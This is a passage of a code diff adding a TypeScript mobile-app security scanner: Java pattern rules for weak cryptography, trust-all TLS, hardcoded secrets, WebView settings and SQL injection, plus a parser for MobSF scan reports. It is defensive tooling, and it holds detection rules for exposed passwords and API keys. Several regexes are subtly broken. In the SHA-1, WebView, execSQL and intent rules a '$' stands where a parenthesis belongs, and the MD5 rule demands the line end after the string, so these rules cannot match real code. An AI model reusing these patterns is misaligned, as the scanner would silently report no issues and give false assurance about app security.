+  ): Promise<Map<string, CodeMatch[]>> {
+    const results = new Map<string, CodeMatch[]>()
+
+    for (const patternDef of patterns) {
+      const matches = await searchPattern(javaFiles, patternDef.pattern)
+      if (matches.length > 0) {
+        results.set(patternDef.name, matches)
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Extract class name from Java file content.
+   */
+  function extractClassName(content: string): string | undefined {
+    const match = content.match(/(?:public\s+)?(?:final\s+)?(?:abstract\s+)?class\s+(\w+)/)
+    return match ? match[1] : undefined
+  }
+
+  /**
+   * Extract method name for a given line.
+   */
+  function extractMethodName(lines: string[], lineIndex: number): string | undefined {
+    // Search backwards for method definition
+    for (let i = lineIndex; i >= 0; i--) {
+      const methodMatch = lines[i].match(
+        /(?:public|private|protected)?\s*(?:static)?\s*(?:final)?\s*\w+\s+(\w+)\s*$/
+      )
+      if (methodMatch) {
+        return methodMatch[1]
+      }
+      // Stop at class definition
+      if (lines[i].includes("class ")) {
+        break
+      }
+    }
+    return undefined
+  }
+
+  /**
+   * Pre-defined security patterns.
+   */
+  export const SECURITY_PATTERNS: SecurityPattern[] = [
+    // Weak Cryptography
+    {
+      name: "weak_crypto_des",
+      pattern: /Cipher\.getInstance\s*\(\s*["']DES/i,
+      severity: "high",
+      owaspMobile: "M10",
+      description: "Weak DES encryption algorithm",
+    },
+    {
+      name: "weak_crypto_ecb",
+      pattern: /Cipher\.getInstance\s*\(\s*["'][^"']*\/ECB/i,
+      severity: "high",
+      owaspMobile: "M10",
+      description: "ECB mode encryption (no IV)",
+    },
+    {
+      name: "weak_hash_md5",
+      pattern: /MessageDigest\.getInstance\s*\(\s*["']MD5["']\s*$/i,
+      severity: "medium",
+      owaspMobile: "M10",
+      description: "Weak MD5 hash algorithm",
+    },
+    {
+      name: "weak_hash_sha1",
+      pattern: /MessageDigest\.getInstance\s*$\s*["']SHA-?1["']\s*$/i,
+      severity: "medium",
+      owaspMobile: "M10",
+      description: "Weak SHA-1 hash algorithm",
+    },
+    {
+      name: "insecure_random",
+      pattern: /new\s+Random\s*\(/,
+      severity: "medium",
+      owaspMobile: "M10",
+      description: "Insecure random number generator",
+    },
+    {
+      name: "hardcoded_iv",
+      pattern: /IvParameterSpec\s*\(\s*(?:new\s+byte\s*\[\s*\]|"[^"]+"|'[^']+')/,
+      severity: "high",
+      owaspMobile: "M10",
+      description: "Hardcoded initialization vector",
+    },
+
+    // Insecure Storage
+    {
+      name: "world_readable",
+      pattern: /MODE_WORLD_READABLE/,
+      severity: "high",
+      owaspMobile: "M9",
+      description: "World-readable file mode",
+    },
+    {
+      name: "world_writable",
+      pattern: /MODE_WORLD_WRITABLE/,
+      severity: "high",
+      owaspMobile: "M9",
+      description: "World-writable file mode",
+    },
+    {
+      name: "external_storage",
+      pattern: /getExternalStorage|EXTERNAL_STORAGE/,
+      severity: "medium",
+      owaspMobile: "M9",
+      description: "External storage usage",
+    },
+    {
+      name: "sensitive_logging",
+      pattern: /Log\.[divwe]\s*\(\s*[^,]+,\s*[^)]*(?:password|token|key|secret|credential)/i,
+      severity: "high",
+      owaspMobile: "M9",
+      description: "Sensitive data in logs",
+    },
+
+    // Insecure Communication
+    {
+      name: "ssl_all_trust",
+      pattern: /TrustAllCertificates|AllTrustingHostnameVerifier|TrustManager\s*\[\s*\]\s*\{/,
+      severity: "critical",
+      owaspMobile: "M5",
+      description: "Trust all SSL certificates",
+    },
+    {
+      name: "hostname_verifier_allow_all",
+      pattern: /ALLOW_ALL_HOSTNAME_VERIFIER|AllowAllHostnameVerifier/,
+      severity: "critical",
+      owaspMobile: "M5",
+      description: "Hostname verification disabled",
+    },
+    {
+      name: "cleartext_http",
+      pattern: /http:\/\/(?!localhost|127\.0\.0\.1|10\.|192\.168\.)/,
+      severity: "medium",
+      owaspMobile: "M5",
+      description: "Cleartext HTTP communication",
+    },
+
+    // WebView Security
+    {
+      name: "webview_javascript",
+      pattern: /setJavaScriptEnabled\s*$\s*true\s*$/,
+      severity: "medium",
+      owaspMobile: "M8",
+      description: "WebView JavaScript enabled",
+    },
+    {
+      name: "webview_file_access",
+      pattern: /setAllowFileAccess\s*$\s*true\s*$/,
+      severity: "high",
+      owaspMobile: "M8",
+      description: "WebView file access enabled",
+    },
+    {
+      name: "webview_universal_access",
+      pattern: /setAllowUniversalAccessFromFileURLs\s*$\s*true\s*$/,
+      severity: "critical",
+      owaspMobile: "M8",
+      description: "WebView universal file access",
+    },
+    {
+      name: "addjavascriptinterface",
+      pattern: /addJavascriptInterface\s*\(/,
+      severity: "high",
+      owaspMobile: "M8",
+      description: "JavaScript interface bridge",
+    },
+
+    // SQL Injection
+    {
+      name: "sql_raw_query",
+      pattern: /rawQuery\s*\(\s*[^,)]+\+/,
+      severity: "high",
+      owaspMobile: "M4",
+      description: "Potential SQL injection in rawQuery",
+    },
+    {
+      name: "sql_exec",
+      pattern: /execSQL\s*$\s*[^)]+\+/,
+      severity: "high",
+      owaspMobile: "M4",
+      description: "Potential SQL injection in execSQL",
+    },
+
+    // Hardcoded Secrets
+    {
+      name: "hardcoded_password",
+      pattern: /(?:password|passwd|pwd)\s*=\s*["'][^"']{4,}["']/i,
+      severity: "high",
+      owaspMobile: "M1",
+      description: "Hardcoded password",
+    },
+    {
+      name: "hardcoded_api_key",
+      pattern: /(?:api[_-]?key|apikey)\s*=\s*["'][^"']{10,}["']/i,
+      severity: "high",
+      owaspMobile: "M1",
+      description: "Hardcoded API key",
+    },
+    {
+      name: "hardcoded_secret",
+      pattern: /(?:secret|token)\s*=\s*["'][^"']{10,}["']/i,
+      severity: "high",
+      owaspMobile: "M1",
+      description: "Hardcoded secret",
+    },
+
+    // Intent Vulnerabilities
+    {
+      name: "implicit_intent",
+      pattern: /new\s+Intent\s*\(\s*["'][^"']+["']\s*$/,
+      severity: "low",
+      owaspMobile: "M8",
+      description: "Implicit intent usage",
+    },
+    {
+      name: "pending_intent_mutable",
+      pattern: /PendingIntent\.get\w+\s*$[^)]*(?:FLAG_MUTABLE|0\s*$)/,
+      severity: "medium",
+      owaspMobile: "M8",
+      description: "Mutable PendingIntent",
+    },
+
+    // Root Detection
+    {
+      name: "root_check_su",
+      pattern: /\/system\/(?:app\/Superuser\.apk|xbin\/su|bin\/su)/,
+      severity: "info",
+      owaspMobile: "M7",
+      description: "Root detection: su binary check",
+    },
+    {
+      name: "root_check_magisk",
+      pattern: /com\.topjohnwu\.magisk/,
+      severity: "info",
+      owaspMobile: "M7",
+      description: "Root detection: Magisk check",
+    },
+
+    // SSL Pinning
+    {
+      name: "ssl_pinning_okhttp",
+      pattern: /CertificatePinner|certificatePinner/,
+      severity: "info",
+      owaspMobile: "M5",
+      description: "OkHttp certificate pinning",
+    },
+    {
+      name: "ssl_pinning_trustkit",
+      pattern: /TrustKit/,
+      severity: "info",
+      owaspMobile: "M5",
+      description: "TrustKit SSL pinning",
+    },
+
+    // Clipboard
+    {
+      name: "clipboard_sensitive",
+      pattern: /ClipboardManager|setPrimaryClip.*(?:password|token|secret)/i,
+      severity: "medium",
+      owaspMobile: "M9",
+      description: "Sensitive data in clipboard",
+    },
+
+    // Backup
+    {
+      name: "backup_agent",
+      pattern: /BackupAgent|BackupAgentHelper/,
+      severity: "info",
+      owaspMobile: "M8",
+      description: "Backup agent implementation",
+    },
+
+    // Biometric
+    {
+      name: "biometric_weak",
+      pattern: /BiometricPrompt.*BIOMETRIC_WEAK/,
+      severity: "medium",
+      owaspMobile: "M3",
+      description: "Weak biometric authentication",
+    },
+  ]
+
+  /**
+   * Analyze Java file for security issues.
+   */
+  export async function analyzeFile(filePath: string): Promise<{
+    className: string | undefined
+    issues: Array<{
+      pattern: SecurityPattern
+      matches: CodeMatch[]
+    }>
+  }> {
+    const content = await fs.readFile(filePath, "utf-8")
+    const className = extractClassName(content)
+    const lines = content.split("\n")
+    const issues: Array<{ pattern: SecurityPattern; matches: CodeMatch[] }> = []
+
+    for (const pattern of SECURITY_PATTERNS) {
+      const matches: CodeMatch[] = []
+
+      for (let i = 0; i < lines.length; i++) {
+        if (pattern.pattern.test(lines[i])) {
+          const startLine = Math.max(0, i - 2)
+          const endLine = Math.min(lines.length - 1, i + 2)
+          const context = lines.slice(startLine, endLine + 1).join("\n")
+
+          matches.push({
+            file: filePath,
+            line: i + 1,
+            code: lines[i].trim(),
+            className,
+            methodName: extractMethodName(lines, i),
+            context,
+          })
+        }
+      }
+
+      if (matches.length > 0) {
+        issues.push({ pattern, matches })
+      }
+    }
+
+    return { className, issues }
+  }
+
+  /**
+   * Extract all strings from Java files.
+   */
+  export async function extractStrings(javaFiles: string[]): Promise<Map<string, string[]>> {
+    const stringMap = new Map<string, string[]>()
+
+    for (const file of javaFiles) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const strings: string[] = []
+
+        // Match string literals
+        const stringMatches = content.matchAll(/"([^"\\]|\\.)*"/g)
+        for (const match of stringMatches) {
+          const str = match[0].slice(1, -1) // Remove quotes
+          if (str.length > 3) {
+            // Skip short strings
+            strings.push(str)
+          }
+        }
+
+        if (strings.length > 0) {
+          stringMap.set(file, strings)
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    return stringMap
+  }
+
+  /**
+   * Find method calls in Java files.
+   */
+  export async function findMethodCalls(
+    javaFiles: string[],
+    methodName: string,
+    className?: string
+  ): Promise<CodeMatch[]> {
+    const pattern = className
+      ? new RegExp(`${className}\\.${methodName}\\s*\\(`, "g")
+      : new RegExp(`\\.?${methodName}\\s*\\(`, "g")
+
+    return searchPattern(javaFiles, pattern)
+  }
+
+  /**
+   * Find class imports.
+   */
+  export async function findImports(
+    javaFiles: string[],
+    importPattern: string
+  ): Promise<Map<string, string[]>> {
+    const importMap = new Map<string, string[]>()
+    const pattern = new RegExp(`import\\s+${importPattern}`, "g")
+
+    for (const file of javaFiles) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const imports: string[] = []
+
+        const matches = content.matchAll(pattern)
+        for (const match of matches) {
+          imports.push(match[0])
+        }
+
+        if (imports.length > 0) {
+          importMap.set(file, imports)
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    return importMap
+  }
+
+  /**
+   * Convert CodeMatch to CodeLocation.
+   */
+  export function toCodeLocation(match: CodeMatch): MobileScanTypes.CodeLocation {
+    return {
+      file: match.file,
+      line: match.line,
+      snippet: match.code,
+      className: match.className,
+      methodName: match.methodName,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/parsers/mobsf.ts b/packages/opencode/src/pentest/mobilescan/parsers/mobsf.ts
new file mode 100644
index 00000000000..9df5842d422
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/parsers/mobsf.ts
@@ -0,0 +1,780 @@
+/**
+ * @fileoverview MobSF JSON Report Parser
+ *
+ * Parser for MobSF (Mobile Security Framework) JSON scan reports.
+ * Extracts findings, vulnerabilities, and security analysis results.
+ *
+ * @module pentest/mobilescan/parsers/mobsf
+ */
+
+import { MobileScanTypes } from "../types"
+import { Log } from "../../../util/log"
+import { MobileScanStorage } from "../storage"
+
+const log = Log.create({ service: "mobilescan.parser.mobsf" })
+
+/**
+ * MobSF parser namespace.
+ */
+export namespace MobsfParser {
+  /**
+   * MobSF Android scan result.
+   */
+  export interface MobSFAndroidResult {
+    file_name: string
+    app_name: string
+    app_type: string
+    size: string
+    md5: string
+    sha1: string
+    sha256: string
+    package_name: string
+    main_activity: string
+    exported_activities: string[]
+    browsable_activities: Record<string, unknown>
+    activities: string[]
+    receivers: string[]
+    providers: string[]
+    services: string[]
+    libraries: string[]
+    target_sdk: string
+    max_sdk: string
+    min_sdk: string
+    version_name: string
+    version_code: string
+    icon_path: string
+    icon_found: boolean
+    certificate_analysis: CertificateAnalysis
+    permissions: Record<string, PermissionInfo>
+    manifest_analysis: ManifestFinding[]
+    network_security: NetworkSecurityAnalysis
+    binary_analysis: BinaryFinding[]
+    code_analysis: Record<string, CodeFinding>
+    niap_analysis: Record<string, unknown>
+    permission_mapping: Record<string, unknown>
+    urls: string[]
+    emails: string[]
+    strings: StringAnalysis
+    firebase_urls: string[]
+    files: FileAnalysis[]
+    exported_count: ExportedCount
+    quark: QuarkAnalysis[]
+    apkid: ApkIdAnalysis
+    secrets: SecretFinding[]
+    trackers: TrackerInfo
+    playstore_details: Record<string, unknown>
+    security_score: number
+    average_cvss: number
+  }
+
+  /**
+   * MobSF iOS scan result.
+   */
+  export interface MobSFiOSResult {
+    file_name: string
+    app_name: string
+    app_type: string
+    size: string
+    md5: string
+    sha1: string
+    sha256: string
+    bundle_id: string
+    bundle_name: string
+    bundle_version_name: string
+    bundle_version_code: string
+    platform_version: string
+    min_os_version: string
+    bundle_supported_platforms: string[]
+    bundle_localizations: string[]
+    bundle_url_types: URLType[]
+    permissions: Record<string, string>
+    insecure_connections: InsecureConnection[]
+    ats_analysis: ATSAnalysis
+    binary_analysis: iOSBinaryAnalysis
+    code_analysis: Record<string, CodeFinding>
+    macho_analysis: MachOAnalysis
+    file_analysis: FileAnalysis[]
+    libraries: LibraryInfo[]
+    urls: string[]
+    emails: string[]
+    strings: StringAnalysis
+    secrets: SecretFinding[]
+    security_score: number
+    average_cvss: number
+  }
+
+  interface CertificateAnalysis {
+    certificate_info: string
+    certificate_findings: string[]
+  }
+
+  interface PermissionInfo {
+    status: string
+    info: string
+    description: string
+  }
+
+  interface ManifestFinding {
+    rule: string
+    title: string
+    severity: string
+    description: string
+    name: string
+    component: string[]
+  }
+
+  interface NetworkSecurityAnalysis {
+    network_findings: NetworkFinding[]
+  }
+
+  interface NetworkFinding {
+    scope: string
+    description: string
+    severity: string
+  }
+
+  interface BinaryFinding {
+    name: string
+    description: string
+    severity: string
+  }
+
+  interface CodeFinding {
+    metadata: {
+      description: string
+      severity: string
+      cvss: number
+      cwe: string
+      masvs: string
+      owasp_mobile: string
+      ref: string
+    }
+    files: Array<{
+      file_path: string
+      match_string: string
+      match_position: number
+      match_lines: number[]
+    }>
+  }
+
+  interface StringAnalysis {
+    strings_so: string[]
+    urls_list: string[]
+    emails_list: string[]
+  }
+
+  interface FileAnalysis {
+    file_path: string
+    finding: string
+    severity: string
+  }
+
+  interface ExportedCount {
+    exported_activities: number
+    exported_services: number
+    exported_receivers: number
+    exported_providers: number
+  }
+
+  interface QuarkAnalysis {
+    crime: string
+    confidence: string
+    score: number
+    weight: number
+    register: string[]
+  }
+
+  interface ApkIdAnalysis {
+    anti_vm: string[]
+    compiler: string[]
+    packer: string[]
+    obfuscator: string[]
+    anti_disassembly: string[]
+    anti_debug: string[]
+    manipulator: string[]
+    dropper: string[]
+  }
+
+  interface SecretFinding {
+    path: string
+    key: string
+    value: string
+    type: string
+  }
+
+  interface TrackerInfo {
+    detected_trackers: number
+    total_trackers: number
+    trackers: Array<{
+      name: string
+      categories: string[]
+      network_signature: string
+      code_signature: string
+      website: string
+    }>
+  }
+
+  interface URLType {
+    name: string
+    schemes: string[]
+  }
+
+  interface InsecureConnection {
+    domain: string
+    finding: string
+  }
+
+  interface ATSAnalysis {
+    ats_summary: Record<string, unknown>
+    ats_findings: Array<{
+      issue: string
+      severity: string
+      description: string
+    }>
+  }
+
+  interface iOSBinaryAnalysis {
+    binary_info: {
+      name: string
+      bin_type: string
+      arch: string
+      platform: string
+      min_os: string
+      sdk: string
+    }
+    binary_flags: {
+      pie: boolean
+      arc: boolean
+      canary: boolean
+      nx: boolean
+      rpath: boolean
+      code_sign: boolean
+      encrypted: boolean
+      restrict: boolean
+      symbol_stripped: boolean
+    }
+    binary_findings: BinaryFinding[]
+  }
+
+  interface MachOAnalysis {
+    dylibs: string[]
+    frameworks: string[]
+  }
+
+  interface LibraryInfo {
+    name: string
+    version: string
+  }
+
+  /**
+   * Parse MobSF Android JSON report.
+   */
+  export function parseAndroidReport(json: MobSFAndroidResult, scanId: string, appId: string): ParsedMobSFResult {
+    log.info("Parsing MobSF Android report", { appName: json.app_name, packageName: json.package_name })
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+    const secrets: MobileScanTypes.ExtractedSecret[] = []
+    const urls: MobileScanTypes.ExtractedURL[] = []
+
+    // Parse manifest findings
+    for (const finding of json.manifest_analysis || []) {
+      findings.push(createFinding(scanId, appId, "android", finding))
+    }
+
+    // Parse binary findings
+    for (const finding of json.binary_analysis || []) {
+      findings.push({
+        id: MobileScanStorage.createFindingId(),
+        scanId,
+        appId,
+        platform: "android",
+        title: finding.name,
+        description: finding.description,
+        severity: mapSeverity(finding.severity),
+        owaspMobile: "M7",
+        category: "binary",
+        recommendation: getRecommendation("M7", finding.name),
+        references: [],
+        falsePositive: false,
+        verified: false,
+        detectedAt: Date.now(),
+      })
+    }
+
+    // Parse code analysis findings
+    for (const [key, finding] of Object.entries(json.code_analysis || {})) {
+      if (finding.files && finding.files.length > 0) {
+        for (const file of finding.files) {
+          findings.push({
+            id: MobileScanStorage.createFindingId(),
+            scanId,
+            appId,
+            platform: "android",
+            title: key,
+            description: finding.metadata.description,
+            severity: mapSeverity(finding.metadata.severity),
+            owaspMobile: mapOwaspMobile(finding.metadata.owasp_mobile || finding.metadata.masvs),
+            category: "code",
+            codeLocation: {
+              file: file.file_path,
+              line: file.match_lines?.[0],
+              snippet: file.match_string,
+            },
+            cwe: finding.metadata.cwe,
+            cvss: finding.metadata.cvss,
+            recommendation: getRecommendation(finding.metadata.owasp_mobile, key),
+            references: finding.metadata.ref ? [finding.metadata.ref] : [],
+            falsePositive: false,
+            verified: false,
+            detectedAt: Date.now(),
+          })
+        }
+      }
+    }
+
+    // Parse network security findings
+    if (json.network_security?.network_findings) {
+      for (const finding of json.network_security.network_findings) {
+        findings.push({
+          id: MobileScanStorage.createFindingId(),
+          scanId,
+          appId,
+          platform: "android",
+          title: `Network Security: ${finding.scope}`,
+          description: finding.description,
+          severity: mapSeverity(finding.severity),
+          owaspMobile: "M5",
+          category: "network",
+          recommendation: getRecommendation("M5", finding.scope),
+          references: [],
+          falsePositive: false,
+          verified: false,
+          detectedAt: Date.now(),
+        })
+      }
+    }
+
+    // Parse secrets
+    for (const secret of json.secrets || []) {
+      secrets.push({
+        id: MobileScanStorage.createSecretId(),
+        type: mapSecretType(secret.type),
+        value: secret.value,
+        maskedValue: maskSecret(secret.value),
+        location: {
+          file: secret.path,
+        },
+        confidence: "high",
+        context: secret.key,
+      })
+    }
+
+    // Parse URLs
+    for (const url of json.urls || []) {
+      try {
+        const parsed = new URL(url)
+        urls.push({
+          id: `url_${Date.now()}_${Math.random().toString(36).slice(2, 6)}`,
+          url,
+          scheme: parsed.protocol.replace(":", ""),
+          host: parsed.hostname,
+          port: parsed.port ? parseInt(parsed.port, 10) : undefined,
+          path: parsed.pathname,
+          location: { file: "extracted" },
+          isHttps: parsed.protocol === "https:",
+          isInternal: isInternalUrl(url),
+        })
+      } catch {
+        // Invalid URL, skip
+      }
+    }
+
+    // Parse Firebase URLs
+    for (const url of json.firebase_urls || []) {
+      urls.push({
+        id: `url_${Date.now()}_${Math.random().toString(36).slice(2, 6)}`,
+        url,
+        scheme: "https",
+        host: new URL(url.startsWith("http") ? url : `https://${url}`).hostname,
+        location: { file: "extracted" },
+        isHttps: true,
+        isInternal: false,
+      })
+    }
+
+    // Extract libraries
+    const libraries: MobileScanTypes.ThirdPartyLibrary[] = (json.libraries || []).map((lib) => ({
+      name: lib,
+      category: "unknown",
+      hasKnownVulnerabilities: false,
+      vulnerabilities: [],
+    }))
+
+    // Extract tracker info
+    if (json.trackers?.trackers) {
+      for (const tracker of json.trackers.trackers) {
+        libraries.push({
+          name: tracker.name,
+          category: "analytics",
+          hasKnownVulnerabilities: false,
+          vulnerabilities: [],
+        })
+      }
+    }
+
+    // Parse APKiD analysis for obfuscation
+    const obfuscation: MobileScanTypes.ObfuscationResult = {
+      detected: (json.apkid?.obfuscator?.length || 0) > 0,
+      tool: json.apkid?.obfuscator?.[0],
+      strength: (json.apkid?.obfuscator?.length || 0) > 0 ? "medium" : "none",
+    }
+
+    return {
+      findings,
+      secrets,
+      urls,
+      libraries,
+      obfuscation,
+      securityScore: json.security_score,
+      averageCvss: json.average_cvss,
+    }
+  }
+
+  /**
+   * Parse MobSF iOS JSON report.
+   */
+  export function parseiOSReport(json: MobSFiOSResult, scanId: string, appId: string): ParsedMobSFResult {
+    log.info("Parsing MobSF iOS report", { appName: json.app_name, bundleId: json.bundle_id })
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+    const secrets: MobileScanTypes.ExtractedSecret[] = []
+    const urls: MobileScanTypes.ExtractedURL[] = []
+
+    // Parse ATS findings
+    for (const finding of json.ats_analysis?.ats_findings || []) {
+      findings.push({
+        id: MobileScanStorage.createFindingId(),
+        scanId,
+        appId,
+        platform: "ios",
+        title: finding.issue,
+        description: finding.description,
+        severity: mapSeverity(finding.severity),
+        owaspMobile: "M5",
+        category: "ats",
+        recommendation: getRecommendation("M5", finding.issue),
+        references: [],
+        falsePositive: false,
+        verified: false,
+        detectedAt: Date.now(),
+      })
+    }
+
+    // Parse binary findings
+    for (const finding of json.binary_analysis?.binary_findings || []) {
+      findings.push({
+        id: MobileScanStorage.createFindingId(),
+        scanId,
+        appId,
+        platform: "ios",
+        title: finding.name,
+        description: finding.description,
+        severity: mapSeverity(finding.severity),
+        owaspMobile: "M7",
+        category: "binary",
+        recommendation: getRecommendation("M7", finding.name),
+        references: [],
+        falsePositive: false,
+        verified: false,
+        detectedAt: Date.now(),
+      })
+    }
+
+    // Parse code analysis findings
+    for (const [key, finding] of Object.entries(json.code_analysis || {})) {
+      if (finding.files && finding.files.length > 0) {
+        for (const file of finding.files) {
+          findings.push({
+            id: MobileScanStorage.createFindingId(),
+            scanId,
+            appId,
+            platform: "ios",
+            title: key,
+            description: finding.metadata.description,
+            severity: mapSeverity(finding.metadata.severity),
+            owaspMobile: mapOwaspMobile(finding.metadata.owasp_mobile || finding.metadata.masvs),
+            category: "code",
+            codeLocation: {
+              file: file.file_path,
+              line: file.match_lines?.[0],
+              snippet: file.match_string,
+            },
+            cwe: finding.metadata.cwe,
+            cvss: finding.metadata.cvss,
+            recommendation: getRecommendation(finding.metadata.owasp_mobile, key),
+            references: finding.metadata.ref ? [finding.metadata.ref] : [],
+            falsePositive: false,
+            verified: false,
+            detectedAt: Date.now(),
+          })
+        }
+      }
+    }
+
+    // Parse insecure connections
+    for (const conn of json.insecure_connections || []) {
+      findings.push({
+        id: MobileScanStorage.createFindingId(),
+        scanId,
+        appId,
+        platform: "ios",
+        title: `Insecure Connection: ${conn.domain}`,
+        description: conn.finding,
+        severity: "medium",
+        owaspMobile: "M5",
+        category: "network",
+        recommendation: "Use HTTPS for all network connections",
+        references: [],
+        falsePositive: false,
+        verified: false,
+        detectedAt: Date.now(),
+      })
+    }
+
+    // Parse secrets
+    for (const secret of json.secrets || []) {
+      secrets.push({
+        id: MobileScanStorage.createSecretId(),
+        type: mapSecretType(secret.type),
+        value: secret.value,
+        maskedValue: maskSecret(secret.value),
+        location: {
+          file: secret.path,
+        },
+        confidence: "high",
+        context: secret.key,
+      })
+    }
+
+    // Parse URLs
+    for (const url of json.urls || []) {
+      try {
+        const parsed = new URL(url)
+        urls.push({
+          id: `url_${Date.now()}_${Math.random().toString(36).slice(2, 6)}`,
+          url,
+          scheme: parsed.protocol.replace(":", ""),
+          host: parsed.hostname,
+          port: parsed.port ? parseInt(parsed.port, 10) : undefined,
+          path: parsed.pathname,
+          location: { file: "extracted" },
+          isHttps: parsed.protocol === "https:",
+          isInternal: isInternalUrl(url),
+        })
+      } catch {
+        // Invalid URL, skip
+      }
+    }
+
+    // Extract libraries
+    const libraries: MobileScanTypes.ThirdPartyLibrary[] = (json.libraries || []).map((lib) => ({
+      name: lib.name,
+      version: lib.version,
+      category: "unknown",
+      hasKnownVulnerabilities: false,
+      vulnerabilities: [],
+    }))
+
+    // Extract binary protections
+    const binaryProtections: MobileScanTypes.BinaryProtections | undefined = json.binary_analysis?.binary_flags
+      ? {
+          pie: json.binary_analysis.binary_flags.pie,
+          arc: json.binary_analysis.binary_flags.arc,
+          stackCanary: json.binary_analysis.binary_flags.canary,
+          nx: json.binary_analysis.binary_flags.nx,
+          encrypted: json.binary_analysis.binary_flags.encrypted,
+          codeSignature: json.binary_analysis.binary_flags.code_sign,
+          restrictSegment: json.binary_analysis.binary_flags.restrict,
+          rpath: json.binary_analysis.binary_flags.rpath,
+          symbols: !json.binary_analysis.binary_flags.symbol_stripped,
+        }
+      : undefined
+
+    return {
+      findings,
+      secrets,
+      urls,
+      libraries,
+      binaryProtections,
+      securityScore: json.security_score,
+      averageCvss: json.average_cvss,
+    }
+  }
+
+  /**
+   * Parsed MobSF result.
+   */
+  export interface ParsedMobSFResult {
+    findings: MobileScanTypes.MobileFinding[]
+    secrets: MobileScanTypes.ExtractedSecret[]
+    urls: MobileScanTypes.ExtractedURL[]
+    libraries: MobileScanTypes.ThirdPartyLibrary[]
+    obfuscation?: MobileScanTypes.ObfuscationResult
+    binaryProtections?: MobileScanTypes.BinaryProtections
+    securityScore?: number
+    averageCvss?: number
+  }
+
+  /**
+   * Create finding from manifest analysis.
+   */
+  function createFinding(
+    scanId: string,
+    appId: string,
+    platform: MobileScanTypes.Platform,
+    finding: ManifestFinding
+  ): MobileScanTypes.MobileFinding {
+    return {
+      id: MobileScanStorage.createFindingId(),
+      scanId,
+      appId,
+      platform,
+      title: finding.title,
+      description: finding.description,
+      severity: mapSeverity(finding.severity),
+      owaspMobile: mapOwaspFromRule(finding.rule),
+      category: "manifest",
+      component: finding.component?.[0],
+      recommendation: getRecommendation(mapOwaspFromRule(finding.rule), finding.title),
+      references: [],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Map MobSF severity to our severity.
+   */
+  function mapSeverity(severity: string): MobileScanTypes.Severity {
+    switch (severity.toLowerCase()) {
+      case "high":
+        return "high"
+      case "warning":
+      case "medium":
+        return "medium"
+      case "info":
+      case "secure":
+        return "info"
+      case "good":
+        return "info"
+      default:
+        return "low"
+    }
+  }
+
+  /**
+   * Map OWASP Mobile category.
+   */
+  function mapOwaspMobile(owasp: string): MobileScanTypes.OwaspMobile {
+    if (!owasp) return "M8"
+
+    // Handle MASVS format like "MSTG-STORAGE-1"
+    if (owasp.includes("STORAGE")) return "M9"
+    if (owasp.includes("CRYPTO")) return "M10"
+    if (owasp.includes("AUTH")) return "M3"
+    if (owasp.includes("NETWORK")) return "M5"
+    if (owasp.includes("PLATFORM")) return "M8"
+    if (owasp.includes("CODE")) return "M7"
+
+    // Handle M1-M10 format
+    const match = owasp.match(/M(\d+)/)
+    if (match) {
+      const num = parseInt(match[1], 10)
+      if (num >= 1 && num <= 10) {
+        return `M${num}` as MobileScanTypes.OwaspMobile
+      }
+    }
+
+    return "M8"
+  }
+
+  /**
+   * Map rule to OWASP Mobile.
+   */
+  function mapOwaspFromRule(rule: string): MobileScanTypes.OwaspMobile {
+    if (rule.includes("backup")) return "M8"
+    if (rule.includes("debug")) return "M8"
+    if (rule.includes("exported")) return "M8"
+    if (rule.includes("permission")) return "M6"
+    if (rule.includes("cleartext")) return "M5"
+    if (rule.includes("intent")) return "M8"
+    return "M8"
+  }
+
+  /**
+   * Map secret type.
+   */
+  function mapSecretType(type: string): MobileScanTypes.SecretType {
+    const typeLower = type.toLowerCase()
+    if (typeLower.includes("aws")) return "aws_key"
+    if (typeLower.includes("google") || typeLower.includes("gcp")) return "gcp_key"
+    if (typeLower.includes("firebase")) return "firebase_key"
+    if (typeLower.includes("azure")) return "azure_key"
+    if (typeLower.includes("api")) return "api_key"
+    if (typeLower.includes("private") || typeLower.includes("key")) return "private_key"
+    if (typeLower.includes("jwt") || typeLower.includes("token")) return "jwt_secret"
+    if (typeLower.includes("oauth")) return "oauth_secret"
+    if (typeLower.includes("database") || typeLower.includes("db")) return "database_credential"
+    return "generic_secret"
+  }
+
+  /**
+   * Mask secret value for display.
+   */
+  function maskSecret(value: string): string {
+    if (value.length <= 8) {
+      return "*".repeat(value.length)
+    }
+    return value.substring(0, 4) + "*".repeat(value.length - 8) + value.substring(value.length - 4)
+  }
+
+  /**
+   * Check if URL is internal/development.
+   */
+  function isInternalUrl(url: string): boolean {
+    const internalPatterns = [
+      "localhost",
+      "127.0.0.1",
+      "10.",
+      "192.168.",
+      "172.16.",
+      ".local",
+      ".internal",
+      "dev.",
+      "staging.",
+      "test.",
+    ]
+    return internalPatterns.some((pattern) => url.includes(pattern))
+  }
+
+  /**
+   * Get recommendation for finding.
+   */
+  function getRecommendation(owaspMobile: string, title: string): string {
+    const recommendations: Record<string, string> = {
+      M1: "Store credentials securely using platform-specific secure storage mechanisms (Android Keystore, iOS Keychain).",
+      M2: "Keep all third-party libraries updated and perform regular security audits of dependencies.",
+      M3: "Implement strong authentication mechanisms with proper session management.",
+      M4: "Validate and sanitize all input data. Use parameterized queries for database operations.",
+      M5: "Implement certificate pinning and ensure all communication uses TLS 1.2+.",
+      M6: "Request only necessary permissions and implement proper data minimization practices.",
+      M7: "Enable code obfuscation, implement integrity checks, and use platform security features.",
+      M8: "Review and fix security misconfigurations. Disable debug mode and set exported=false for internal components.",
+      M9: "Encrypt sensitive data at rest. Use platform-provided secure storage APIs.",
+      M10: "Use modern cryptographic algorithms (AES-256, SHA-256+) with proper key management.",
+    }
+
+    return recommendations[owaspMobile] || `Review and address the security issue: ${title}`
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/profiles.ts b/packages/opencode/src/pentest/mobilescan/profiles.ts
new file mode 100644
index 00000000000..abd048c961b
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/profiles.ts
@@ -0,0 +1,389 @@
+/**
+ * @fileoverview Mobile Scan Profiles
+ *
